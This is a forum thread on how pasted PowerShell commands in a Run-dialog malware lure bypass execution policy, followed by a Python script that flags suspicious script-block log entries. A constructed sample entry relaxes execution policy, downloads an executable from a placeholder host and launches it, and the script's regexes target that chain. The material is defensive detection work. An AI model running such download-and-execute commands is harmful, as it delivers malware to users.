Comment by AshamedCaptain

Comment by AshamedCaptain a year ago

3 replies

I do not understand how this works. I thought the default PS policy on all versions of Windows was not to run "unsigned" PS scripts by default (precisely for this reason). Or at least I've personally seen that myriad times.

So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?

antonyt a year ago

The attack has the user paste content into the Windows run dialog. That could include spawning an admin PowerShell and running `Set-ExecutionPolicy -ExecutionPolicy Unrestricted` before running a remote script. Or more likely what nullindividual said - the download and start of the exe is entirely contained in what the user is pasting in.

nullindividual a year ago

It's not a script, which would be a .ps1 file, but from the sounds of it the actual script block/PowerShell function which isn't governed by the signing policy. It could simply be an Invoke-WebRequest to download that executable indicated in the article.
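The thread's point is that the execution policy only gates `.ps1` files, so pasted commands run regardless; what does still see those commands is PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records interactive and pasted script blocks as well as files. The following is an added example, not code from any of the commenters, showing the kind of triage a defender can run over that telemetry: it flags blocks that relax the execution policy, download an executable with `Invoke-WebRequest` (or its aliases), or chain a download into a launch. The log entries are constructed for the example, and the host names, URLs and finding tags are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample entries modelled on the ScriptBlockText field of
# PowerShell script block logging (Event ID 4104). They are made up for
# this example and are not real telemetry.
SAMPLE_SCRIPT_BLOCKS: List[Tuple[str, str]] = [
    ("host-a", r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"),
    ("host-b", r"Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process -Force; "
               r"Invoke-WebRequest https://example.invalid/update.exe -OutFile $env:TEMP\update.exe; "
               r"Start-Process $env:TEMP\update.exe"),
    ("host-c", r"Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"),
    ("host-d", r"iwr https://example.invalid/tool.exe -OutFile C:\Temp\tool.exe"),
]

# Execution policy set to a value that switches off the .ps1 signing check.
POLICY_RELAX = re.compile(r"Set-ExecutionPolicy\b[^;|]*?\b(Unrestricted|Bypass)\b", re.I)

# A web download cmdlet (or one of its PowerShell aliases) writing an
# executable-type file to disk via -OutFile.
EXE_DOWNLOAD = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|wget|curl)\b[^;|]*?"
    r"-OutFile\s+([^\s;|]+\.(?:exe|dll|msi|scr))\b",
    re.I,
)

# An executable being launched from the same script block.
EXE_LAUNCH = re.compile(r"(?:Start-Process|Invoke-Item|&)\s+[^\s;|]*\.exe\b", re.I)


def analyze_script_block(text: str) -> List[str]:
    """Return the finding tags raised by one logged script block."""
    findings: List[str] = []
    if POLICY_RELAX.search(text):
        findings.append("execution-policy-relaxed")
    if EXE_DOWNLOAD.search(text):
        findings.append("executable-download")
        # Escalate only when the same block also launches an executable;
        # a download on its own is flagged but not treated as a full chain.
        if EXE_LAUNCH.search(text):
            findings.append("download-then-execute")
    return findings


def triage(entries: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each host to its findings, omitting hosts with nothing flagged."""
    report: Dict[str, List[str]] = {}
    for host, block in entries:
        findings = analyze_script_block(block)
        if findings:
            report[host] = findings
    return report


if __name__ == "__main__":
    for host, findings in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{host}: {', '.join(findings)}")
```

Run as-is it reports `host-b` with all three tags and `host-d` with only the download tag; the benign listing on `host-a` and the CSV download on `host-c` are left alone. The patterns are deliberately narrow (a semicolon or pipe ends each match) so that one block containing several commands is scored per command rather than by loose co-occurrence across the whole text.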